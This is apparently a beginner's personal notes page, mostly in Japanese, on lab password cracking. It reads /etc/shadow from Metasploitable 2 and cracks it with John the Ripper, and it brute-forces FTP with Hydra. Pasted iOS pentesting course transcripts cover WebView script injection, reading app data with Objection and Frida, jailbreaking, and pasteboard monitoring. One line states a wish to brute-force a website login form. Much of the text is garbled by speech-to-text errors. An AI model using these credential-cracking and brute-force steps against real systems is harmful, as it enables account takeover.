パスワードクラッキング　メモ #初心者

メモ程度の雑な書き方です。ChatGPT使いAIでやってみました。　
誤字が多いですが、記念にそのままでいます。

ジョンチャリッパーとは正式名称をジョンTHEリッパーパスワードクラッカーといって代表的なパスワードクラックツールの一つです。
UNIXやLINUXのユーザーパスワードの暗号化に使われるDESMDFIVEWINDOWSログオンに使われるNTFSなど、幅広い暗号化アルゴリズムに対応
しています。
ここでは、Metasploit２のパスワードを解析してみます。
まず、kaliLINUXおよびメタスプリンタープルツーのふたつの仮想マシンを立ち上げて、それぞれのIPアドレスを確認してください。
デラックスでのアカウント情報はエトス、パスワードとしてシャドウの2つのファイルで通常管理されています。
パスワードファイルはユーザーの属性が記載されたファイルで、ユーザー名やグループ、ID、ホームディレクトリー、パスシェルなどが記載されてい
ます。
SHADOWファイルは、ユーザー名とそれに対するパスワードハッシュなどが記載されています。
通常、ROOT権限でないと閲覧することはできません。
それでは、カリーLINUXで端末ウインドウをもう一つ開いて、SSHでMetasplotable２に接続します。

メタスポイトはに接続できました。
さらに、ROOT権限を取得します。
ROOT権限を取得しました。

突然、配下のパスワードファイルを表示してみます。

パスワードファイルの中身をハイライトして。
クリップボードにコピーします。

もう一つのターミナルから。
新しい
ファイルを生成して、その中にクリップボードにコピーしたパスワードファイルの中身を張り付けます。

次に、catコマンドでSHADOWファイルを表示してみます。

表示したSHADOWファイルの中身を。
ハイライトしてクリップボードにコピーします。

仮にLINUX上で新規に。ファイルを生成して

その中にクリップボードにコピーしてある作動ファイルの中身を貼り付けます。
ファイルをセーブします。

Metasplotable２のパスワードとシャドーファイルをコピーした2つのファイルからJohn the Ripperで解析可能な形式に変換したファイルを生成します。
ANSHADOWコマンドを使用して、パスワードファイルとおSHADOWファイルを一つにまとめてパスワードドットDBファイルを作成します。

生成されたパスワードを、DBファイルからJohn the Ripperを実行します。

それでは解読されたユーザーIDとパスワードを使用して、メタスポイトタブにSSH接続ができるかどうか確認します。

ジョーンズリッパーで解析したパスワードを使用してメタスペリータブに接続できることが確認できました。

次はHydraをAIでやってみました

Hydraというパスワードクラッカーを使用してブルートフォースアタックの検証を行います。

まず、kaliLINUXおよびMetasplotable２の2つの仮想マシンを立ち上げて、それぞれのIPアドレスを確認してください。
それでは、ヘルプコマンドの使用方法を確認します。
生地サンプルを見ると、昼ドララージエルユーザーリストはIPHONEラージPIIパスワードリスト。
ターゲット。
IPアドレス通信プロトコルのように記述することが分かります

。
まず、彼LINUXに用意されているワードリストから使用するユーザIDとパスワードの辞書を用意します。

lsコマンドを使い多くの辞書が用意されていますが、

ここでは。
この辞書をベースに、ユーザーリストとパスワードリストの作成を行います。

この辞書はいう。
一行にユーザーIDとパスワードの2つ入ってますので。
これをユーザーだけとパスワードだけに分解します。

まずカットコマンドで。
ユーザーリストだけを取り出してそれを。
ホームディレクトリー配下のでをlogins.txtというファイルに書き出します。

パスワードも同様に。
フィールドに取り出したものをpwst.txtというファイルに書き出してます。

ホームディレクトリーに戻り、正常に書き出しが終了しているかどうか確認します。
正常に作成されてるようです。

これでHydraとで使用する辞書を用意することができました。
Hydraとを実行します。
ターゲットIPアドレスを記入します。
通信プロトコルは仮にここではFTPにします。

解読にに成功すると以下の表示が出ます

それでは、実際にメタスプレーと普通に接続できるかどうか確認します。
FTPというコマンドが実装されてないようですので、ここではSSHでメタスプレートラブルツーに接続してみます。

メタスプレータブーに接続できたことが確認できました。

AIでそれなりの事でできました！「おー」って感じです！
ウェブサイトのログインフォームのブルートフォース攻撃を実行したいです。
お疲れ様でした

参考：【サイバーセキュリティ完全攻略】

追加メモ
先にHydoraでパスワードを解ってからジョンザリッパーを

辞書テキスト
burnett_top_500.txt rservices_from_users.txt
cms400net_default_userpass.txt sap_common.txt
common_roots.txt sap_default.txt
dangerzone_a.txt sap_icm_paths.txt
dangerzone_b.txt scada_default_userpass.txt
db2_default_pass.txt sensitive_files.txt
db2_default_user.txt sensitive_files_win.txt
db2_default_userpass.txt http_owa_common.txt
default_pass_for_services_unhash.txt sid.txt
default_userpass_for_services_unhash.txt idrac_default_pass.txt
default_users_for_services_unhash.txt snmp_default_pass.txt
dlink_telnet_backdoor_userpass.txt idrac_default_user.txt
hci_oracle_passwords.csv tftp.txt
http_default_pass.txt ipmi_passwords.txt
http_default_userpass.txt ipmi_users.txt
http_default_users.txt joomla.txt
oracle_default_userpass.txt keyboard-patterns.txt
password.lst malicious_urls.txt
piata_ssh_userpass.txt mirai_pass.txt
postgres_default_pass.txt tomcat_mgr_default_pass.txt
postgres_default_user.txt tomcat_mgr_default_userpass.txt
postgres_default_userpass.txt tomcat_mgr_default_users.txt
root_userpass.txt unix_passwords.txt
routers_userpass.txt mirai_user.txt
rpc_names.txt mirai_user_pass.txt
vnc_passwords.txt unix_users.txt
multi_vendor_cctv_dvr_pass.txt vxworks_collide_20.txt
vxworks_common_20.txt

root@kali:/usr/share/wordlists/metasploit#

Hydoraの解析内容

最後の接続確認

Hydoraヘルプ
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]--
head | get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc lda
p2[s] ldap3[-{cram| digest}md5] [s] mssql mysql nntp oracle-listener oracle-sid pcanywhere
pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb sm
p[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4: // connect://)
% export HYDRA_PROXY-connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login: pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
hydra - user -P passlist.txt ftp://192.168.0.1
hydra L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra C defaults.txt -6 pop3s://[2001: db8::1]: 143/TLS: DIGEST-MD5
hydra - admin -p password ftp://[192.168.0.0/24]/
hydra L logins.txt -P pws.txt -M targets.txt ssh [

////////////////////////////////////////////////////////////////////////////////
１VirtualBoxのダウンロード

2ダウンロード先に行く

3アプリを開く
　コマンドを入力して展開する

4まとめ

1
Metasploit2からだうんろーどする

2
解凍する

3
ばーちゃるBOXの新規を押す

4
以下のように設定する　「次へ」

Ⅴハードうぇらを以下のように設定する

VirtualBoxをKali Linuxにインストールする手順は以下の通りです。

ターミナルを開きます。Kali Linuxのデスクトップ上で右クリックし、"Open Terminal"（または同等のオプション）を選択します。

ターミナルで以下のコマンドを実行して、システムを最新の状態に更新します。

sql
Copy code
sudo apt update
sudo apt upgrade
VirtualBoxのパッケージをインストールするために、以下のコマンドを実行します。

Copy code
sudo apt install virtualbox
インストールが完了したら、以下のコマンドを実行してVirtualBoxを起動します。

Copy code
virtualbox
VirtualBoxが正常に起動すると、仮想マシンを作成して実行できるようになります。

これでKali Linux上でVirtualBoxをインストールすることができます。必要な仮想マシンを作成して、別のオペレーティングシステムを実行することができます。

メモ
https://seekt.hatenablog.com/entry/2022/05/22/085220

///////////////////////////////////////////////////////////////////////////
ssh -i "C:\Users\202101N034user\Desktop#key-seq001.pem” kali@10. 10. 46. 35
deb http://kali. download/kali kali-rolling main contrib non-free non-free-firmware
Cannot initiate the connection to kali. download:80 (2606:4700::6812:6764). connect (101: Network is
unreachable) Cannot initiate the connection to kali. download:80 (2606:4700::6812:6664). - connect (101:
Network is unreachable) Could not connect to kali. download:80 (104. 18. 102. 100), connection timed out Could
not connect to kali. download:80 (104. 18. 103. 100), connection timed out
Reading package lists... Done
Building dependency tree... Done
4.10 Reading state information... Done

All packages are up to date.
W: Failed to fetch http://kali.download/kali/dists/kali-rolling/InRelease Cannot initiate the connection to
kali. download:80 (2606:4700::6812:6764). - connect (101: Network is unreachable) Cannot initiate the
connection to kali. download:80 (2606:4700::6812:6664). – connect (101: Network is unreachable) Could not
connect to kali. download:80 (104. 18. 102. 100), connection timed out Could not connect to kali. download:80
(104. 18. 103. 100), connection timed out
W: Some index files failed to download. They have been ignored, or old ones used instead. |

deb http://kali. download/kali kali-rolling main contrib non-free non-free-firmware
Cannot initiate the connection to kali. download:80 (2606:4700::6812:6764). connect (101: Network is
unreachable) Cannot initiate the connection to kali. download:80 (2606:4700::6812:6664). - connect (101:
Network is unreachable) Could not connect to kali. download:80 (104. 18. 102. 100), connection timed out Could
not connect to kali. download:80 (104. 18. 103. 100), connection timed out
Reading package lists... Done
Building dependency tree... Done
4.10 Reading state information... Done

のエラーメッセージは、Kali Linuxのパッケージリポジトリへの接続に問題があることを示しています。いくつかの対処法を試してみることができます。

ネットワーク接続の確認: まず、インターネット接続が正常かどうかを確認してください。他のウェブサイトにアクセスできるかどうかを確認し、必要に応じてネットワーク接続を修正してください。

ミラーサーバーの変更: Kali Linuxのパッケージリポジトリは、ミラーサーバーからパッケージをダウンロードします。接続できないミラーサーバーが問題の原因である場合、別のミラーサーバーを試すことができます。

Kali Linuxのソースリストを編集します。ターミナルで以下のコマンドを実行します（エディタはお好みのものを使用してください）：

bash
Copy code
sudo nano /etc/apt/sources.list
ソースリストファイルが開かれたら、"deb http://kali.download/kali kali-rolling main contrib non-free non-free-firmware" の行を探します。

この行の先頭に "#" を追加してコメントアウトし、以下の行を追加します（元の行はコメントアウトして残しておくことができます）：

deb http://http.kali.org/kali kali-rolling main contrib non-free
ファイルを保存して閉じます。

ソースリストを更新し、パッケージリポジトリを更新します：

sudo apt update
パッケージリポジトリが正常に更新されたかどうかを確認してください。

インターネット接続の問題を解決できない場合は、一時的にパッケージリポジトリを無効にすることも検討できます。

ソースリストファイルを編集します（先程と同様に実行します）：

sudo nano /etc/apt/sources.list
"deb http://kali.download/kali kali-rolling main contrib non-free non-free-firmware" の行をコメントアウトします（行の先頭に "#" を追加）。

ファイルを保存して閉じます。

パッケージリポジトリを無効にすると、Kali Linuxのパッケージをアップデートやインストールすることはできませんが、システムは以前にインストール

///////////////////////////////////////////////////////////////////////////
Kali LinuxでVirtualBoxをインストールする手順を以下に示します。Kali LinuxにはVirtualBoxのリポジトリがデフォルトで含まれているため、パッケージマネージャーを使用してインストールすることができます。

1 ターミナルを開きます。
2 アップデートとアップグレードを行うため、以下のコマンドを実行します。

sudo apt update
sudo apt upgrade

3 VirtualBoxをインストールするため、以下のコマンドを実行します。
sudo apt install virtualbox

5 インストールが開始されると、パッケージのダウンロードと依存関係の解決が行われます。確認プロンプトが表示された場合はYを入力し、Enterキーを押します。
6 インストールが完了すると、VirtualBoxがKali Linuxに正常にインストールされます。

これで、VirtualBoxがKali Linuxにインストールされました。インストールが完了したら、VirtualBoxを起動することができます。ターミナルでvirtualboxと入力し、Enterキーを押すか、アプリケーションメニューからVirtualBoxを起動します。

注意点: Kali Linuxにはすでに仮想化機能が組み込まれているため、VirtualBoxのインストールは必須ではありません。ただし、VirtualBoxを使用する場合は、上記の手順に従ってインストールすることができます。

///////////////////////////////////////////////

追加

実施

///////////////////////////////////////////////////////////////////
WebView XSS

Now let's see.

A client side injection vulnerability in secure store application.

This client side vulnerability is caused because of the use of webviews.

If you remember, our application's about US feature fetches some HTML page from a remote server.

Now let's quickly check how this page is being loaded.

I am trying to retrieve the page once again.

Look at that.

It is basically making a Http request.

Let me give a right click and click on do intercept response to this request and forward it.

Look at that.

We are getting some HTML response to this page.

Now what we can basically do is we can add some additional JavaScript here by saying script alert,

hagged

and forward this and let me show you what happened on the screen.

Look at that.

So basically, somebody who is able to do a man in the middle attack against this application in a coffee

shop can actually tamper the responses coming to this application and inject JavaScript that can be

executed by this app.

Now, instead of showing an alert box, it is possible to display a phishing page into which the victim

may enter the credentials leading to a phishing attack.

This is how client side attacks are also possible in iOS applications.

///////////////////////////////////////////////////////////////////
安全でないローカルデータストレージの脆弱性 - ジェイルブレイクされていないデバイス

deploy the application

in debug mode.

As you can see, the application is now waiting for a connection.

Now let's open up another tab and type.

Objection, explore.

So basically we are going to use objection tool to explore the local data storage of the application.

Now, after running Objection Explorer, the application should be launched.

Now, this is the screen that we usually see when we launch the application.

Once again, we will have to configure the server.

So let's first configure the server using the IP address of the secure store server.

And let's quickly check if we are able to communicate with the server.

Yes, we are able to.

So now let's quickly log in using secure store account and let's tap on sign in.

There you go.

Now let's enter some local data into this application and let's type branch name and email ID.

Let's tap on save bank details and let's try to retrieve them as well.

Just to confirm that the app is functioning fine.

There you go.

Okay, Now, what we're interested in is we want to check the local data storage of this app on this

device.

Objection.

Supports both Android and iOS devices.

Now, we are only going to see the iOS specific features in this course.

Let's type env.

That's the first command that I always run when I do any iOS security assessments using.

Objection.

Look at that.

It is going to give us all the paths that we are interested in.

The first one is the bundle path.

So basically we can see the actual binary of this application inside this folder.

And this is the caches folder and this is the document directory and this is what we have explored earlier

and spotted a lot of sensitive data.

Now let's copy this and let's navigate to this directory by pasting it here.

Let's hit enter and let's type LS.

So if you look at the output, basically you are able to explore the file system of this app using objection

from this objection terminal.

We can actually run commands from the laptop.

To do that, we will just have to specify a bang or an exclamation mark and type the command.

Look at that.

Now let's type LS and this command will be executed on objections Shell.

So if you prefix the command with this, it will basically be executed on your laptop.

Now, what we are interested in is we want to take a look at the contents of these files.

So there are two options that we have within objection.

One, we can download the file onto the laptop and view the contents on the laptop, or you can also

view the file contents using the file command and using Cat and specify the name of the file.

As you can see, objection is already showing us with the list of files we have in this directory.

So what we are interested in is the user details dot p list.

Look at that.

Objection is able to read the file for us.

Nice.

Now the next one that I want to show is file download file.

And let's specify, download and look at that.

It is automatically showing us the list of files that are available for download.

Let's try to download this bank details dot db and look at that.

It is downloaded into the current directory.

This is the current directory on my local machine.

So let's quickly copy this and see if the file has been downloaded into this directory.

Look at that.

There is a file called Bank Details Dot DB.

Now we don't have to download these DB files onto the local machine because objection also comes with

a utility called SQLite.

So if you look at this SQLite connect bank details dot db.

Look at that.

We are able to connect to the bank details dot db file right from objection shell.

So now we can type dot tables.

Look at that.

This is much better in terms of the appearance.

So we can actually use objection itself instead of going back to the shell on the laptop.

Now this is the table that we have gotten.

Let's try to type select star from bank details and look at that.

That is very nice representation of this data.

Now, this is how we can explore local data storage using objection on Non-jailbroken devices.

//////////////////////////////////////////////////////////////////////
Download the vulnerable Apps from the link provided bellow (Minimum iOS version - iOS 12):

Bundle Identifiers: cst.securestorev1 and cst.securestorev2

Download the vulnerable Apps from the link provided bellow (Minimum iOS version - iOS 10):

Bundle Identifiers: cst.securestorev1.1 and cst.securestorev2.1

Download the vulnerable Apps from the link provided bellow (For iPhone SE 1st Generation):

Bundle Identifiers: cst.securestorev1.2 and cst.securestorev2.2

Download backend server from the link provided below:

Usage: Import the ova file into virtual box and connect it in bridged network mode. So, this server will be reachable by the apps we are testing.

Credentials to login:

Username: securestore

password: securestore

Default user accounts available to login from the app (you can also register new account using signup feature):

+----+-----------------------+-

username | password

+----+-----------------------+-

securestore | securestore

attacker | attacker

+----+-----------------------+-
///////////////////////////////////////////////////////////////////ジェイルブレイクされた iDevice を使用したラボのセットアップ

Now let's see how we can set up a lab using our jailbroken iPhone.

Obviously we need to have an iPhone which is jailbroken, to be able to follow the instructions in this

lab.

How to jailbreak an iPhone is out of scope for this course, but let me quickly show you how I have

jailbroken my device.

I am switching to a browser and as I mentioned earlier, the device that I have jailbroken is running

iOS 12.4.

So I have gone ahead and searched online for jailbreak exploits, which can be used to jailbreak my

device, which is iPhone six seconds running iOS 12.4.

And I found check rain.

And if you look at this, this is the latest release that I have used here.

And this relays basically fixes an issue in 12.4, which is exactly what I have in my hand.

It appears that this software was causing the device to panic and reboot on attempted shutdown.

I'm pretty lucky that I have a working exploit available when I wanted, so I have just gone ahead and

downloaded this for Mac OS and I have started this application and connected the device and the application

shows the step by step procedure to jailbreak the device.

So that's how I have jailbroken my device.

It is recommended to have a jailbroken device because the setup is going to be pretty easy if you have

a jailbroken device.

But if you don't have it, it's fine.

We are going to do everything even on a non jailbroken device as well.

All right.

So let me switch back to my slides.

And once after jailbreaking, the iPhone, you will see an application called Cydia.

Let me project the screen of my iPhone.

Okay.

So this is how the jailbroken iPhone looks like.

You can see there is an application called Cydia.

Cydia is something like app Store from where we can download tools that are useful for Pentesting.

Now I'm going to use Cydia to download Openssh.

This is the first tool that I usually download after jailbreaking any device.

So I'm going to search for Openssh and I'm going to click on that and I'm going to click install and

confirm.

And this should download Openssh for me.

All right.

So let me tap on return to Cydia, because Openssh is now installed.

Once that is done, let's go back to sources.

And click on edit.

And click on add.

And add another repo

build.frida.re

and tap on this add source button.

There you go.

So it is verifying the URL and this repo should be added into our CDR.

Okay, let's return to Syria.

And once that is done, we should see build .3.3 is there.

Let's tap on that and let's go to all packages.

And if you see, I have installed Frida for pre 812 devices.

If we install this, it is going to install Frida server onto the device and using Frida server.

As you can see from the description here, we can inject JavaScript to explore iOS applications over

USB.

We are going to see how we can do that later, but for now just install Frida server by choosing an

appropriate option here.

In my case my device is a pre 812 device.

You can actually check for your model and see which chip is being used in your device.

So depending on the chip that is used on your device, you need to install 812 plus or pre 812 or if

it is a 32 bit device, probably you should go for 32 bit version of Frida server.

Once this is done, we are pretty much done now since we have Frida server on the device.

We need to have Frida client on the laptop because it's a client server based setup.

We need to install a client on the local machine.

So let's switch to the terminal and install Frida.

But before that, I would like to make another point that we also need to install.

Objection.

Objection is another tool which is built on top of Frida and it can be used to perform runtime manipulation

of the applications.

It's not just runtime manipulation.

We can do much more than that, but I usually use objection for runtime manipulation in most of the

cases.

But in this course we are going to see other use cases of objection as well, such as exploring the

local data storage and stuff like that.

Now the reason why I have included objection here is that if we install objection on our local machine,

it will automatically install Frida for us.

So let's go ahead and install objection on the laptop.

In my case, I have already done that, but let me quickly show you how to install that on the GitHub

page.

And let's scroll down and if you see the installation is pretty simple, all you have to do is just

type pip3 install objection, right?

So once that is done you will have objection and Frida installed on the laptop.

In some cases the Frida and objection may not be in path.

That's what happened in my case.

My Frida and objection were installed, but when I tried to invoke them from the terminal, I get an

output of objection not found and Frida not found.

The reason is they are not added to the system path.

So if you face this problem you will have to manually add those binaries into your system path.

So once you are done with the installation of objection and Frida, we want to verify the setup that

we have done so far.

Number one, I want to verify my SSH connection.

Number two, I want to verify if Frida server is running fine.

Number three, I want to verify my objection.

Let's first begin with the SSH setup ssh route at 192.168.0.102.

We can check the IP address of the iPhone from the Wi-Fi settings.

This is how it looks like.

So in my case it is.

192.168.0.102 and I'm hitting enter.

And by default when you install open SSH from Cydia, the password is alpine.

So I have just entered alpine and I am able to log into the device.

So this is the spelling of Alpine and this is the password of open SSH by default when you install it

from Cydia.

Right.

So this confirms that my SSH setup is working fine.

Now let's go ahead and check if Frida is working fine or not to do a quick smoke test.

We can run.

Frida Dash.

Dash u dash u specifies that my device is connected over USB and Frida is going to make a connection

with the Frida server using the USB connection.

So let's type Frida Dash ps space dash UI so that we are going to get the list of bundle identifiers

that are installed on the device.

And let's probably grep for mail.

As you can see, the mail application is installed and my Frida client is able to list the bundle identifier

of this application.

Right?

Similarly, we can basically list out all the applications that are installed on the device.

You can also see this.

Application that I have shown you earlier and you can see application that is running on the device.

So essentially this Frida client is able to communicate with the Frida server and it is able to list

out all the apps that are installed on the device.

Now that's perfect.

So the Frida setup is working fine.

Now let me quickly check the objection setup as well.

As you can see, the objection is installed on my laptop.

Now, if we want to quickly check if objection is able to connect to the device, we can do that by

getting the bundle identifier of mail application once again.

And let's try to use this

objection dash dash gadget, and let's specify this bundle identifier and type explorer.

And I'm going to start the mail application on my device and let's hit enter.

As you can see, objection is able to hook into this mobile email application which is running on my

iPhone.

So this confirms that objection is working fine and we are good to go.

Let me go back to the slides.

I'm pretty much done with what I wanted to show in this video.

We have installed Openssh using Cydia.

We have installed Frida Server and we have installed objection on the laptop and we have also installed

Frida client on the laptop by installing objection.

And finally we have verified ssh Frida and objection setup.

So that brings us to the end of this video.

In the next video we are going to discuss how to install the vulnerable applications in the jailbroken

////////////////////////////////////////////////////////////////////

安全でないローカルデータストレージの脆弱性
In this video.

Let's talk about insecure data storage.

Finding out insecure data storage vulnerabilities on an application requires you to have a jailbroken

device.

It is also possible for us to view the applications local storage on a non-jailbroken device using the

setup that we have.

So I'm going to demonstrate insecure data storage vulnerabilities both on a non-jailbroken device as

well as on a jailbroken device.

Okay, so now let's get started.

Mobile apps often store data on client side.

If you remember when we started the application for the first time, it was telling us that the server

is not configured.

How is it possible for the application to determine that the server is not yet configured?

It is making some client side check to see if a specific file exists.

If the server is already configured, the file exists and the app will not show us the message again.

Right.

So that means the app is storing something on the client side to do some tasks.

Similarly, some developers make a mistake of storing sensitive data on the client side.

While it is required for us to have jailbroken device to be able to access this data.

It is not a best practice to save sensitive data in clear text on the local storage.

Right?

So that's what exactly we are going to see in the vulnerable application in this video.

So these are the few ways that apps use to store local data.

Plist files NS user Defaults, SQLite databases, core data and keychain Plist file is something like

an XML file that can be used to store key value pairs and NS user defaults is also something similar

and SQLite databases are lightweight databases that can be used to store and retrieve data, and core

data is also something like SQLite databases and Keychain is Apple's recommended way of storing sensitive

data on the device.

In this course we are not going to go through every single type.

We will cover some of these based on the applications functionalities.

So the vulnerable application that we are going to use may store some sensitive data on the client side.

So let's go ahead and explore if it is storing any data on the client side using any of these techniques.

First we are going to do it on a jailbroken device and after that we are going to use a non jailbroken

device.

Okay.

So let's switch to a terminal and let me quickly find out the IP address of this device.

This is 102 SSH route at 192.168.0.102.

And let's enter the password.

And

now let's launch the application.

And let's first log in using secure store account.

And let's tap sign in.

Now let's tap on view profile once again just to make sure that we are browsing through the entire application.

Now let's enter some test data into this application.

This is like a secret vault application.

We can basically store some bank account numbers into this app, and when we want to view the information,

we can retrieve that.

So let's see how this app is storing all this data.

Bank name.

Let me enter test account number one, two, three, four, five, six, seven.

There are no restrictions on the client side, so you can basically enter anything.

But there are some basic validations.

Like if you don't enter every field, it is going to throw an error.

Similarly, if you try to retrieve something without entering an email ID, it will once again throw

an error.

Right.

The branch name test and email id test at test.com and let's tap on save bank details.

As you can see, your data has been saved successfully.

Now test@test.com

and let's tap on show bank details.

As you can see, it is retrieving whatever the data that we have entered, that's fine.

Now let's go ahead and explore the local file system of this app.

On the jailbroken device, as I mentioned earlier, the data directory is inside slash var.

Mobile.

Uppercase C containers.

Data application.

And inside this we will have some uuids.

Every time you install an application, it gets a new Uuid by the device.

Now we don't know the device Uuid yet, so let's just navigate to this directory first and we are going

to use some Linux foo to find out the directory of this application.

Let's type, find dash type and let's specify that it's a directory and let's specify the name of the

directory.

This has to be the bundle identifier of this app.

So it has to be CSD dot secure store.

We won.

So this is the bundle identifier of secure store v1 application.

So let's hit enter.

As you can see, it has identified the bundle identifier and this is the location of our application.

So let's navigate to this and let's type LS There are four different directories here, so let's navigate

to documents.

And there are some interesting files here.

One is bank details dot DB.

And another one is config dot plist.

First run dot p list and user details dot p list.

Since we don't need this mobile screen anymore, let me just expand it here.

Now.

What we are interested in is we are interested in all of them.

So let's go through one by one.

I will begin with this first run dot P list.

Let me copy this and type cat and paste the file name.

And if you look at this, it says is first run set to false.

So that means the app is already run.

Okay, so this file is not so interesting.

So let's go to the next one.

Let's go to config dot p list.

I'm going to open config dot playlist using cat.

And if you look at this, this p list file has the server IP address.

This is the server that we have configured.

So once again, not so interesting.

Anyway, we can see this IP address in Burpsuite.

Now let's go back and let's check out the next file which is user details dot P list.

Let's copy this and let's paste it and look at that.

It has an authentication token of a specific user and the username of that user is secure store and

it says he is logged in.

Now it is very common in bug bounty programs that if you find something like this on client side, they

will probably reject it.

Now what we have to do is we will have to turn this local storage vulnerability into something more

valuable.

So we are going to see how we can turn this into an authorization vulnerability later in this course.

But for now, remember, this is how you can explore the local data storage to find out sensitive data

that is stored by the app.

Now let's move on.

And there is one more file that is of our interest, which is bank details dot DB.

Let's check what kind of file it is by typing file space bank details dot db.

As you can see, this is a SQLite file, so we need to have a SQLite client like this.

Looks like we don't have any SQLite client on this device.

That's fine.

We can just pull this file out and we can explore it on the local machine.

So what I'm going to do is I'm going to desktop iOS Pentesting and here I'm going to make a new directory

called Local Storage.

And I'm navigating there and here I'm going to download that using Sftp 192 168.0.102 and let's enter

the password and let's provide the path of this particular file.

And let's type get slash bank details.

Dot db.

As you can see, the file has been pulled out.

Now let's quit.

And if you see the local storage folder, we do have a new file called Bank Details Dot DB.

Now let's once again run file command against it just to confirm that the file is intact.

Now let's use a SQLite command line client to connect to this.

And explore the database.

Okay.

We have connected to the database.

Now let's type dot tables.

There you go.

We can see the table names inside this.

We do have a table called Bank Details.

So let's run some basic SQL query to see if there is anything interesting in this table.

So select star from bank details.

Looks like there is something wrong here.

There is no from from is missing there.

And there you go.

This is what we have entered into the application.

This application is meant to be a secret vault.

It has to keep the secrets secret.

But it is exposing everything in clear text because the data that is entered into the app is being stored

on the disk in clear text.

Right.

So this is how we can identify local storage vulnerabilities in a jailbroken device.

In the next video, we are going to see how to explore local data storage using a non-jailbroken device.

//////////////////////////////////////////////////////////////////////
UI ペーストボード内の機密データ

Now let's see another commonly seen client side issue, which is storing sensitive data in the pasteboard.

So what it means is if you can copy something from your application, it will be stored in the device's

pasteboard.

So let's see how we can test for that.

Let's use objection to start the application.

As you can see, the application has been started.

In objection, we have an option where we can use iOS pasteboard and there is an option to monitor that.

So let's hit enter.

Now let's come back to the application and let's try to save something.

If you look at this, I have just saved something earlier.

It is just showing it here in the output.

Now, let me store something else.

Secure store and let me enter the password here.

And let me just quickly copy this and let me quickly sign in.

Okay.

Now look at that.

The password that I have just copied is pasted here.

So this is something that we can usually find in applications.

If the applications allow the users to copy something into the pasteboard, in this case, this secure

store application is allowing the users to copy the passwords into the pasteboard and we managed to

retrieve that content from the pasteboard using objection.

We can similarly do this on a non-jailbroken device by launching the application in debug mode and hooking

into that by using objection and then running this command iOS Space Pasteboard Space Monitor.

//////////////////////////////////////////////////////////////////////////////////////////////////////

・・・・・・・・・・・・・・・・///////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////